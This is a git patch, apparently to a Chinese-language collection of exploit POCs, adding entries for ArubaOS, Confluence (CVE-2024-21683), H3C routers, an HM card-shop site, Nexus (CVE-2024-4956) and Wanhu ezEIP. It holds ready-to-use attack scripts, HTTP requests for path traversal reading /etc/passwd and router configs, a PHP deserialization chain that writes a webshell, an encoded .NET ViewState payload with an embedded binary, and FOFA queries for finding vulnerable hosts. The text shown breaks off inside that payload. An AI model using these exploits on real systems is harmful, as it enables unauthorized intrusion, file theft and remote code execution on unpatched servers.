From 4d11bd309de163226a999da185e6e55503903adb Mon Sep 17 00:00:00 2001 From: wy876 Date: Sat, 25 May 2024 13:57:14 +0800 Subject: [PATCH] =?UTF-8?q?525=E6=9B=B4=E6=96=B0=E6=BC=8F=E6=B4=9E?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ArubaOS-RCE漏洞(CVE-2024-26304).md | 132 +++++++++++++++ Confluence远程命令执行漏洞(CVE-2024-21683).md | 147 +++++++++++++++++ H3C路由器userLogin.asp信息泄漏漏洞.md | 47 ++++++ HM发卡网反序列化漏洞.md | 152 ++++++++++++++++++ Nexus未授权目录穿越漏洞(CVE-2024-4956).md | 31 ++++ README.md | 26 ++- 万户ezEIP-success.aspx存在反序列化漏洞.md | 32 ++++ ...理系统FileUpProductupdate.aspx任意文件上传漏洞.md | 42 +++++ ...E-Office10-OfficeServer任意文件上传漏洞.md | 47 ++++++ ...ginSSO.jsp存在QL注入漏洞(CNVD-2021-33202).md | 53 ++++++ 瑞星EDR-XSS漏洞可打管理员cookie.md | 23 +++ ...NC-warningDetailInfo接口存在SQL注入漏洞.md | 25 +++ ...c电子采购信息系统securitycheck存在sql注入.md | 33 ++++ ...计费管理系统存在debug.php远程命令执行漏洞.md | 23 +++ ...费管理系统存在download.php任意文件读取漏洞.md | 29 ++++ ...V6-inspect_file-upload存在任意文件上传漏洞.md | 20 ++- ...载定位监控平台SQL注入漏洞(XVE-2023-23744).md | 24 +++ ...监控平台getAlser.acion接口处存在信息泄露漏洞.md | 25 +++ ...CMSV6车载视频监控平台xz_center信息泄露漏洞.md | 18 +++ 金山云EDR任意文件上传漏洞.md | 50 ++++++ 20 files changed, 970 insertions(+), 9 deletions(-) create mode 100644 ArubaOS-RCE漏洞(CVE-2024-26304).md create mode 100644 Confluence远程命令执行漏洞(CVE-2024-21683).md create mode 100644 H3C路由器userLogin.asp信息泄漏漏洞.md create mode 100644 HM发卡网反序列化漏洞.md create mode 100644 Nexus未授权目录穿越漏洞(CVE-2024-4956).md create mode 100644 万户ezEIP-success.aspx存在反序列化漏洞.md create mode 100644 智慧校园(安校易)管理系统FileUpProductupdate.aspx任意文件上传漏洞.md create mode 100644 泛微E-Office10-OfficeServer任意文件上传漏洞.md create mode 100644 泛微E-cology-LoginSSO.jsp存在QL注入漏洞(CNVD-2021-33202).md create mode 100644 瑞星EDR-XSS漏洞可打管理员cookie.md create mode 100644 用友NC-warningDetailInfo接口存在SQL注入漏洞.md create mode 100644 用友nc电子采购信息系统securitycheck存在sql注入.md create mode 100644 蓝海卓越计费管理系统存在debug.php远程命令执行漏洞.md create mode 100644 蓝海卓越计费管理系统存在download.php任意文件读取漏洞.md create mode 100644 通天星CMSV6车载定位监控平台SQL注入漏洞(XVE-2023-23744).md create mode 100644 通天星CMSV6车载视频监控平台getAlser.acion接口处存在信息泄露漏洞.md create mode 100644 通天星CMSV6车载视频监控平台xz_center信息泄露漏洞.md create mode 100644 金山云EDR任意文件上传漏洞.md diff --git a/ArubaOS-RCE漏洞(CVE-2024-26304).md b/ArubaOS-RCE漏洞(CVE-2024-26304).md new file mode 100644 index 0000000..61a8791 --- /dev/null +++ b/ArubaOS-RCE漏洞(CVE-2024-26304).md @@ -0,0 +1,132 @@ +## ArubaOS-RCE漏洞(CVE-2024-26304) + +底层 L2/L3 管理服务中存在缓冲区溢出漏洞,可能会通过发送发往 PAPI(Aruba 接入点管理协议)UDP 端口 (8211) 的特制数据包,导致未经身份验证的远程代码执行。成功利用此漏洞可以导致以特权用户身份在底层操作系统上执行任意代码。 + +## poc + +```python +import re +import sys +import hexdump +import argparse +import requests + +from rich.console import Console +from urllib.parse import urlparse +from alive_progress import alive_bar +from typing import List, Tuple, Optional, TextIO +from concurrent.futures import ThreadPoolExecutor, as_completed + +warnings = requests.packages.urllib3 +warnings.disable_warnings(warnings.exceptions.InsecureRequestWarning) + +class ArubaRCE: + + def __init__(self): + self.console = Console() + self.parser = argparse.ArgumentParser(description='ArubaRCE') + self.setup_arguments() + self.results: List[Tuple[str, str]] = [] + self.output_file: Optional[TextIO] = None + if self.args.output: + self.output_file = open(self.args.output, 'w') + + def setup_arguments(self) -> None: + self.parser.add_argument('-u', '--url', help='The ArubaRCE / Gateway target (e.g., https://192.168.1.200)') + self.parser.add_argument('-f', '--file', help='File containing a list of target URLs (one URL per line)') + self.parser.add_argument('-o', '--output', help='File to save the output results') + self.parser.add_argument('-v', '--verbose', action='store_true', help='Enable verbose mode') + self.parser.add_argument('--only-valid', action='store_true', help='Only show results with valid sessions') + self.args = self.parser.parse_args() + + def print_results(self, header: str, result: str) -> None: + if self.args.only_valid and "[+]" not in header: + return + + formatted_msg = f"{header} {result}" + self.console.print(formatted_msg, style="white") + if self.output_file: + self.output_file.write(result + '\n') + + def normalize_url(self, url: str) -> str: + if not url.startswith("http://") and not url.startswith("https://"): + url = f"https://{url}" + + parsed_url = urlparse(url) + normalized_url = f"{parsed_url.scheme}://{parsed_url.netloc}" + return normalized_url + + def dump_memory(self, url: str) -> None: + full_url = self.normalize_url(url) + headers = { + # [REDACTED. Get full code here https://t.ly/C1-D1] + print("Headers:", headers) + } + + try: + r = requests.get( + f"{full_url}/oauth/redacted", # [REDACTED. Get full code here https://t.ly/C1-D1] + headers=headers, + verify=False, + timeout=10 + ) + content_bytes = r.content + + if r.status_code == 200 and content_bytes: + # [REDACTED. Get full code here https://t.ly/C1-D1] + print("Content bytes:", content_bytes) + + except Exception as e: + print("Error:", e) + + def clean_bytes(self, data: bytes) -> bytes: + # [REDACTED. Get full code here https://t.ly/C1-D1] + print("Cleaning bytes...") + + def find_session_tokens(self, content_bytes: bytes) -> List[str]: + # [REDACTED. Get full code here https://t.ly/C1-D1] + print("Finding session tokens...") + + def test_session_cookie(self, url: str, session_token: str) -> bool: + headers = { + "Cookie": f"[REDACTED. Get full code here https://t.ly/C1-D1]={session_token}" + } + try: + r = requests.post( + # [REDACTED. Get full code here https://t.ly/C1-D1] + ) + # [REDACTED. Get full code here https://t.ly/C1-D1] + print("Session cookie test result:", result) + return result + + except Exception as e: + print("Error:", e) + return False + + def run(self) -> None: + if self.args.url: + # [REDACTED. Get full code here https://t.ly/C1-D1] + for header, result in self.results: + self.print_results(header, result) + elif self.args.file: + # [REDACTED. Get full code here https://t.ly/C1-D1] + pass # Placeholder for code execution for file processing + else: + self.console.print("[bold red][-][/bold red] URL or File must be provided.", style="white") + sys.exit(1) + + + if self.output_file: + self.output_file.close() + +if __name__ == "__main__": + getRCE = ArubaRCE() + getRCE.run() +``` + + + +## 漏洞来源 + +- https://github.com/Roud-Roud-Agency/CVE-2024-26304-RCE-exploits +- https://www.tenable.com/cve/CVE-2024-26304 \ No newline at end of file diff --git a/Confluence远程命令执行漏洞(CVE-2024-21683).md b/Confluence远程命令执行漏洞(CVE-2024-21683).md new file mode 100644 index 0000000..460e590 --- /dev/null +++ b/Confluence远程命令执行漏洞(CVE-2024-21683).md @@ -0,0 +1,147 @@ +## Confluence远程命令执行漏洞(CVE-2024-21683) + +Confluence是Atlassian公司研发的一个专业的企业知识管理与协同软件。其存在远程命令执行漏洞,攻击者可以通过该漏洞获取服务器权限。***当然是有前提条件,需要有个账号:*** + +## 影响版本 + +``` +Confluence Data Center = 8.9.0 +8.8.0 <= Confluence Data Center <= 8.8.1 +8.7.1 <= Confluence Data Center <= 8.7.2 +8.6.0 <= Confluence Data Center <= 8.6.2 +8.5.0 <= Confluence Data Center and Server <= 8.5.8 (LTS) +8.4.0 <= Confluence Data Center and Server <= 8.4.5 +8.3.0 <= Confluence Data Center and Server <= 8.3.4 +8.2.0 <= Confluence Data Center and Server <= 8.2.4 +8.1.0 <= Confluence Data Center and Server <= 8.1.4 +8.0.0 <= Confluence Data Center and Server <= 8.0.4 +7.20.0 <= Confluence Data Center and Server <= 7.20.3 +7.19.0 <= Confluence Data Center and Server <= 7.19.21 (LTS) +7.18.0 <= Confluence Data Center and Server <= 7.18.3 +7.17.0 <= Confluence Data Center and Server <= 7.17.5 +``` + +## fofa + +``` +icon_hash="-305179312" +``` + +## poc + +```bash +POST /admin/plugins/newcode/addlanguage.action HTTP/2 +Host: ip +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 +Accept-Encoding: gzip, deflate +Accept: */* +Connection: keep-alive +Content-Length: 372 +Content-Type: multipart/form-data; boundary=f6dae662e22371daece5ff851b1c4a39 + +--f6dae662e22371daece5ff851b1c4a39 +Content-Disposition: form-data; name="newLanguageName" + +test +--f6dae662e22371daece5ff851b1c4a39 +Content-Disposition: form-data; name="languageFile"; filename="exploit.js" +Content-Type: text/javascript + +new java.lang.ProcessBuilder["(java.lang.String[])"](["ping 5hnlyo.dnslog.cn"]).start() +--f6dae662e22371daece5ff851b1c4a39-- +``` + + + +## python脚本 + +```python +import argparse +import os + +import requests +from bs4 import BeautifulSoup + +def GeyAltToken(url, proxy, session): + headers = { + "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" + } + alttoken_url = f"{url}/admin/plugins/newcode/configure.action" + resp = session.get(url=alttoken_url, headers=headers, verify=False, proxies=proxy, timeout=20) + if "atlassian-token" in resp.text: + soup = BeautifulSoup(resp.text, 'html.parser') + meta_tag = soup.find('meta', {'id': 'atlassian-token', 'name': 'atlassian-token'}) + if meta_tag: + content_value = meta_tag.get('content') + return content_value + + else: + print("Meta tag not found") + +def LoginAsAdministrator(session, url, proxy, username, password): + login_url = url + "/dologin.action" + headers = { + "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36", + "Content-Type": "application/x-www-form-urlencoded" + } + data = f"os_username={username}&os_password={password}&login=%E7%99%BB%E5%BD%95&os_destination=%2F" + session.post(url=login_url, headers=headers, data=data, proxies=proxy, verify=False, timeout=20) + +def DoAuthenticate(session, url, proxy, password, alt_token): + login_url = url + "/doauthenticate.action" + headers = { + "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36", + "Content-Type": "application/x-www-form-urlencoded" + } + data = f"atl_token={alt_token}&password={password}&authenticate=%E7%A1%AE%E8%AE%A4&destination=/admin/viewgeneralconfig.action" + session.post(url=login_url, headers=headers, data=data, proxies=proxy, verify=False, timeout=20) +def UploadEvilJsFile(session, url, proxy, jsFilename, jsFileContent, alt_token): + url = f"{url}/admin/plugins/newcode/addlanguage.action" + data = { + "atl_token": alt_token, + "newLanguageName": "test" + } + files = { + "languageFile": ( + jsFilename, jsFileContent, "text/javascript") + } + headers = { + "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" + } + session.post(url, headers=headers, data=data, files=files, verify=False, proxies=proxy, timeout=20) + +def ParseArgs(): + parser = argparse.ArgumentParser(description="CVE-2024-21683-RCE") + parser.add_argument("-u", "--url", type=str, help="target url to check, eg: http://192.168.198.1:8090", required=True) + parser.add_argument("-p", "--proxy", type=str, default="http://127.0.0.1:8083", help="proxy url, eg: http://127.0.0.1:8083", required=False) + parser.add_argument("-au", "--admin-username", type=str, help="The username of the user who is in the Administrators group", required=True) + parser.add_argument("-ap", "--admin-password", type=str, help="The password of the user who is in the Administrators group", required=True) + parser.add_argument("-f", "--file", type=str, help="exploit file", default="exploit.js", required=True) + parser.add_argument("-n", "--name", type=str, help="newLanguageName", default="test", required=True) + return parser.parse_args() + +if __name__ == '__main__': + args = ParseArgs() + if not args.proxy: + proxy = {} + else: + proxy = { + "http": args.proxy, + "https": args.proxy + } + session = requests.session() + jsfn = os.path.basename(args.file) + jsfc = open(args.file, "r", encoding="utf-8").read() + LoginAsAdministrator(session, args.url.strip("/"), proxy, args.admin_username, args.admin_password) + alt_token = GeyAltToken(args.url.strip("/"), proxy, session) + DoAuthenticate(session, args.url.strip("/"), proxy, args.admin_username, alt_token) + UploadEvilJsFile(session, args.url.strip("/"), proxy, jsfn, jsfc, alt_token) +``` + + + +## 漏洞来源 + +- https://github.com/W01fh4cker/CVE-2024-21683-RCE + + \ No newline at end of file diff --git a/H3C路由器userLogin.asp信息泄漏漏洞.md b/H3C路由器userLogin.asp信息泄漏漏洞.md new file mode 100644 index 0000000..f690e49 --- /dev/null +++ b/H3C路由器userLogin.asp信息泄漏漏洞.md @@ -0,0 +1,47 @@ +## H3C路由器userLogin.asp信息泄漏漏洞 + + + +## fofa + +``` +app="H3C-Ent-Router" +``` + + + +## poc + +``` +/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg +/userLogin.asp/../actionpolicy_status/../M60.cfg +/userLogin.asp/../actionpolicy_status/../GR8300.cfg +/userLogin.asp/../actionpolicy_status/../GR5200.cfg +/userLogin.asp/../actionpolicy_status/../GR3200.cfg +/userLogin.asp/../actionpolicy_status/../GR2200.cfg +/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg +/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg +/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg +/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg +/userLogin.asp/../actionpolicy_status/../ER5200.cfg +/userLogin.asp/../actionpolicy_status/../ER5100.cfg +/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg +/userLogin.asp/../actionpolicy_status/../ER3260.cfg +/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg +/userLogin.asp/../actionpolicy_status/../ER3200.cfg +/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg +/userLogin.asp/../actionpolicy_status/../ER3108G.cfg +/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg +/userLogin.asp/../actionpolicy_status/../ER3100.cfg +/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg +``` + +``` +GET /userLogin.asp/../actionpolicy_status/../ER8300G2.cfg HTTP/1.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 +Host: +``` + +![image-20240524233044125](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202405242330199.png) + +![image-20240524233826952](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202405242338044.png) \ No newline at end of file diff --git a/HM发卡网反序列化漏洞.md b/HM发卡网反序列化漏洞.md new file mode 100644 index 0000000..fbc1938 --- /dev/null +++ b/HM发卡网反序列化漏洞.md @@ -0,0 +1,152 @@ +## HM发卡网反序列化漏洞 + +源码下载地址:https://551f.lanzoub.com/iruk9wu9czi?w + + + +## 反序列数据生成poc + +```php +files=[new Pivot()]; + } + +} +namespace think; +use think\model\relation\HasOne; // use 这里是函数名 用大写开头 写成了use think\model\relation\hasOne; +use think\console\Output; +abstract class Model{ + protected $append = []; + protected $error; + public $parent; // 类型写错写错了 写成了 protected $parent; + public function __construct(){ + $this->append=["getError"]; + $this->error=new HasOne(); + $this->parent=new Output(); + } +} +namespace think\model\relation; +use think\model\Relation; +class HasOne extends OneToOne{ + function __construct(){ + parent::__construct(); + } +} +namespace think\model; +use think\db\Query; +abstract class Relation{ + protected $selfRelation; + protected $query; + function __construct(){ + $this->selfRelation=false; + $this->query= new Query(); + } +} +namespace think\console; +use think\session\driver\Memcache; +class Output{ + private $handle = null; + protected $styles = []; //类型错了 写成了private $styles = []; + function __construct(){ + $this->styles=['getAttr']; //这个条件忘记加了 注意上下文 + $this->handle=new Memcache(); + } +} +namespace think\db; +use think\console\Output; +class Query{ + protected $model; + function __construct(){ + $this->model= new Output(); + } +} +namespace think\model\relation; +use think\model\Relation; +abstract class OneToOne extends Relation{ + + protected $bindAttr = []; + function __construct(){ + parent::__construct(); + $this->bindAttr=["kanjin","kanjin"]; + + } +} +namespace think\session\driver; +use think\cache\driver\File; +class Memcache{ + protected $handler = null; + function __construct(){ + $this->handler=new File(); + } +} +namespace think\cache\driver; +use think\cache\Driver; +class File extends Driver{ + protected $options=[]; + function __construct(){ + parent::__construct(); + $this->options = [ + 'expire' => 0, + 'cache_subdir' => false, + 'prefix' => '', + 'path' => 'php://filter/convert.iconv.utf-8.utf-7|convert.base64-decode/resource=aaaPD9waHAgcGhwaW5mbygpOz8+IA==/../a.php', + 'data_compress' => false, + ]; + } +} +namespace think\cache; +abstract class Driver{ + protected $tag; + function __construct(){ + $this->tag=true; + } +} +namespace think\model; +use think\Model; +class Pivot extends Model{ +} +use think\process\pipes\Windows; +echo base64_encode(serialize(new Windows())); + +// +?> +``` + +![image-20240523221609630](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202405232216691.png) + +## 利用poc + +``` +POST /index.php/shop/order/orderContent?order_no=1 HTTP/1.1 +Host: x.x.x.x +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/114.0 + +search_content=TzoyNzoidGhpbmtccHJvY2Vzc1xwaXBlc1xXaW5kb3dzIjoxOntzOjM0OiIAdGhpbmtccHJvY2Vzc1xwaXBlc1xXaW5kb3dzAGZpbGVzIjthOjE6e2k6MDtPOjE3OiJ0aGlua1xtb2RlbFxQaXZvdCI6Mzp7czo5OiIAKgBhcHBlbmQiO2E6MTp7aTowO3M6ODoiZ2V0RXJyb3IiO31zOjg6IgAqAGVycm9yIjtPOjI3OiJ0aGlua1xtb2RlbFxyZWxhdGlvblxIYXNPbmUiOjM6e3M6MTE6IgAqAGJpbmRBdHRyIjthOjI6e2k6MDtzOjY6ImthbmppbiI7aToxO3M6Njoia2FuamluIjt9czoxNToiACoAc2VsZlJlbGF0aW9uIjtiOjA7czo4OiIAKgBxdWVyeSI7TzoxNDoidGhpbmtcZGJcUXVlcnkiOjE6e3M6ODoiACoAbW9kZWwiO086MjA6InRoaW5rXGNvbnNvbGVcT3V0cHV0IjoyOntzOjI4OiIAdGhpbmtcY29uc29sZVxPdXRwdXQAaGFuZGxlIjtPOjI5OiJ0aGlua1xzZXNzaW9uXGRyaXZlclxNZW1jYWNoZSI6MTp7czoxMDoiACoAaGFuZGxlciI7TzoyMzoidGhpbmtcY2FjaGVcZHJpdmVyXEZpbGUiOjI6e3M6MTA6IgAqAG9wdGlvbnMiO2E6NTp7czo2OiJleHBpcmUiO2k6MDtzOjEyOiJjYWNoZV9zdWJkaXIiO2I6MDtzOjY6InByZWZpeCI7czowOiIiO3M6NDoicGF0aCI7czoxMTA6InBocDovL2ZpbHRlci9jb252ZXJ0Lmljb252LnV0Zi04LnV0Zi03fGNvbnZlcnQuYmFzZTY0LWRlY29kZS9yZXNvdXJjZT1hYWFQRDl3YUhBZ2NHaHdhVzVtYnlncE96OCtJQT09Ly4uL2EucGhwIjtzOjEzOiJkYXRhX2NvbXByZXNzIjtiOjA7fXM6NjoiACoAdGFnIjtiOjE7fX1zOjk6IgAqAHN0eWxlcyI7YToxOntpOjA7czo3OiJnZXRBdHRyIjt9fX19czo2OiJwYXJlbnQiO086MjA6InRoaW5rXGNvbnNvbGVcT3V0cHV0IjoyOntzOjI4OiIAdGhpbmtcY29uc29sZVxPdXRwdXQAaGFuZGxlIjtPOjI5OiJ0aGlua1xzZXNzaW9uXGRyaXZlclxNZW1jYWNoZSI6MTp7czoxMDoiACoAaGFuZGxlciI7TzoyMzoidGhpbmtcY2FjaGVcZHJpdmVyXEZpbGUiOjI6e3M6MTA6IgAqAG9wdGlvbnMiO2E6NTp7czo2OiJleHBpcmUiO2k6MDtzOjEyOiJjYWNoZV9zdWJkaXIiO2I6MDtzOjY6InByZWZpeCI7czowOiIiO3M6NDoicGF0aCI7czoxMTA6InBocDovL2ZpbHRlci9jb252ZXJ0Lmljb252LnV0Zi04LnV0Zi03fGNvbnZlcnQuYmFzZTY0LWRlY29kZS9yZXNvdXJjZT1hYWFQRDl3YUhBZ2NHaHdhVzVtYnlncE96OCtJQT09Ly4uL2EucGhwIjtzOjEzOiJkYXRhX2NvbXByZXNzIjtiOjA7fXM6NjoiACoAdGFnIjtiOjE7fX1zOjk6IgAqAHN0eWxlcyI7YToxOntpOjA7czo3OiJnZXRBdHRyIjt9fX19fQ== +``` + +![image-20240523221918969](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202405232219061.png) + + + +![image-20240523221943077](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202405232219142.png) + + + +文件路径 + +``` +http://127.0.0.1/a.php3b58a9545013e88c7186db11bb158c44.php +``` + +![image-20240523222022587](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202405232220643.png) + + + diff --git a/Nexus未授权目录穿越漏洞(CVE-2024-4956).md b/Nexus未授权目录穿越漏洞(CVE-2024-4956).md new file mode 100644 index 0000000..9a2bca2 --- /dev/null +++ b/Nexus未授权目录穿越漏洞(CVE-2024-4956).md @@ -0,0 +1,31 @@ +## Nexus未授权目录穿越漏洞(CVE-2024-4956) + +Nexus Repository Manager 3 是一款软件仓库,可以用来存储和分发Maven、NuGET等软件源仓库。 + +其3.68.0及之前版本中,存在一处目录穿越漏洞。攻击者可以利用该漏洞读取服务器上任意文件。 + + + + +## poc + +``` +GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 +Host: localhost:8081 +Accept-Encoding: gzip, deflate, br +Accept: */* +Accept-Language: en-US;q=0.9,en;q=0.8 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36 +Connection: close +Cache-Control: max-age=0 +``` + +![image-20240523225823421](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202405232258493.png) + + + +## 漏洞来源 + +- https://github.com/vulhub/vulhub/blob/master/nexus/CVE-2024-4956/README.zh-cn.md + + \ No newline at end of file diff --git a/README.md b/README.md index 862d89b..cf367e2 100644 --- a/README.md +++ b/README.md @@ -1,8 +1,32 @@ # 漏洞收集 -收集整理漏洞EXp/POC,大部分漏洞来源网络,目前收集整理了500多个poc/exp,善用CTRL+F搜索 +收集整理漏洞EXP/POC,大部分漏洞来源网络,目前收集整理了500多个poc/exp,善用CTRL+F搜索 +## 2024.05.25 新增漏洞 + +- 瑞星EDR-XSS漏洞可打管理员cookie + +- 金山云EDR任意文件上传漏洞 + +- HM发卡网反序列化漏洞 + +- Nexus未授权目录穿越漏洞(CVE-2024-4956) +- 泛微E-cology-LoginSSO.jsp存在QL注入漏洞(CNVD-2021-33202) +- 万户ezEIP-success.aspx存在反序列化漏洞 +- 通天星CMSV6车载定位监控平台SQL注入漏洞(XVE-2023-23744) +- 通天星CMSV6车载视频监控平台getAlser.acion接口处存在信息泄露漏洞 +- 通天星CMSV6车载视频监控平台xz_center信息泄露漏洞 +- 智慧校园(安校易)管理系统FileUpProductupdate.aspx任意文件上传漏洞 +- 泛微E-Office10-OfficeServer任意文件上传漏洞 +- ArubaOS-RCE漏洞(CVE-2024-26304) +- H3C路由器userLogin.asp信息泄漏漏洞 +- 用友nc电子采购信息系统securitycheck存在sql注入 +- 用友NC-warningDetailInfo接口存在SQL注入漏洞 +- Confluence远程命令执行漏洞(CVE-2024-21683) +- 蓝海卓越计费管理系统存在debug.php远程命令执行漏洞 +- 蓝海卓越计费管理系统存在download.php任意文件读取漏洞 + ## 2024.05.23 新增漏洞 - 致远OAV52019系统properties信息泄露漏洞 diff --git a/万户ezEIP-success.aspx存在反序列化漏洞.md b/万户ezEIP-success.aspx存在反序列化漏洞.md new file mode 100644 index 0000000..26e973b --- /dev/null +++ b/万户ezEIP-success.aspx存在反序列化漏洞.md @@ -0,0 +1,32 @@ +## 万户ezEIP-success.aspx存在反序列化漏洞 + + + +## fofa + +``` +app="万户网络-ezEIP" +``` + + + +## poc + +``` +POST /member/success.aspx HTTP/1.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 +Accept-Encoding: gzip, deflate +Accept: */* +Connection: close +SID: d2hvYW1p +Content-Type: application/x-www-form-urlencoded +TYPE: C +Host: + +__VIEWSTATE=%2FwEyiGEAAQAAAP%2F%2F%2F%2F8BAAAAAAAAAAwCAAAAV1N5c3RlbS5XaW5kb3dzLkZvcm1zLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OQUBAAAAIVN5c3RlbS5XaW5kb3dzLkZvcm1zLkF4SG9zdCtTdGF0ZQEAAAARUHJvcGVydHlCYWdCaW5hcnkHAgIAAAAJAwAAAA8DAAAAxy8AAAIAAQAAAP%2F%2F%2F%2F8BAAAAAAAAAAQBAAAAf1N5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkxpc3RgMVtbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0DAAAABl9pdGVtcwVfc2l6ZQhfdmVyc2lvbgUAAAgICQIAAAAKAAAACgAAABACAAAAEAAAAAkDAAAACQQAAAAJBQAAAAkGAAAACQcAAAAJCAAAAAkJAAAACQoAAAAJCwAAAAkMAAAADQYHAwAAAAEBAAAAAQAAAAcCCQ0AAAAMDgAAAGFTeXN0ZW0uV29ya2Zsb3cuQ29tcG9uZW50TW9kZWwsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0zMWJmMzg1NmFkMzY0ZTM1BQQAAABqU3lzdGVtLldvcmtmbG93LkNvbXBvbmVudE1vZGVsLlNlcmlhbGl6YXRpb24uQWN0aXZpdHlTdXJyb2dhdGVTZWxlY3RvcitPYmplY3RTdXJyb2dhdGUrT2JqZWN0U2VyaWFsaXplZFJlZgIAAAAEdHlwZQttZW1iZXJEYXRhcwMFH1N5c3RlbS5Vbml0eVNlcmlhbGl6YXRpb25Ib2xkZXIOAAAACQ8AAAAJEAAAAAEFAAAABAAAAAkRAAAACRIAAAABBgAAAAQAAAAJEwAAAAkUAAAAAQcAAAAEAAAACRUAAAAJFgAAAAEIAAAABAAAAAkXAAAACRgAAAABCQAAAAQAAAAJGQAAAAkaAAAAAQoAAAAEAAAACRsAAAAJHAAAAAELAAAABAAAAAkdAAAACR4AAAAEDAAAABxTeXN0ZW0uQ29sbGVjdGlvbnMuSGFzaHRhYmxlBwAAAApMb2FkRmFjdG9yB1ZlcnNpb24IQ29tcGFyZXIQSGFzaENvZGVQcm92aWRlcghIYXNoU2l6ZQRLZXlzBlZhbHVlcwAAAwMABQULCBxTeXN0ZW0uQ29sbGVjdGlvbnMuSUNvbXBhcmVyJFN5c3RlbS5Db2xsZWN0aW9ucy5JSGFzaENvZGVQcm92aWRlcgjsUTg%2FAgAAAAoKAwAAAAkfAAAACSAAAAAPDQAAAAASAAACTVqQAAMAAAAEAAAA%2F%2F8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDABKREWMAAAAAAAAAAOAAAiELAQsAAAoAAAAGAAAAAAAAjikAAAAgAAAAQAAAAAAAEAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACAAAAAAgAAAAAAAAMAQIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAADQpAABXAAAAAEAAAKgCAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAAlAkAAAAgAAAACgAAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAAKgCAAAAQAAAAAQAAAAMAAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAGAAAAACAAAAEAAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAABwKQAAAAAAAEgAAAACAAUAlCIAAKAGAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABswAwAcAgAAAQAAEQIoAwAACigEAAAKCgZvBQAACm8GAAAKBm8HAAAKbwgAAAoGbwkAAApvCgAACnIBAABwbwsAAAoLFo0JAAABDH4MAAAKDQclEwg5lQEAABEIcgsAAHAoDQAACi0nEQhyDwAAcCgNAAAKOrsAAAARCHITAABwKA0AAAo6DgEAADhgAQAAcw4AAAoTBBEEbw8AAApyGQAAcG8QAAAKKBEAAAoGbwkAAApvCgAACnIpAABwbwsAAAooEgAACm8TAAAKEwURBG8PAAAKcjEAAHARBSgUAAAKbxUAAAoRBG8PAAAKF28WAAAKEQRvDwAAChdvFwAAChEEbw8AAAoWbxgAAAoRBG8ZAAAKJhEEbxoAAApvGwAAChMGBm8HAAAKEQZvHAAACji7AAAABm8JAAAKbx0AAApyOQAAcG8LAAAKKBIAAAoMKBEAAAoGbwkAAApvHQAACnJJAABwbw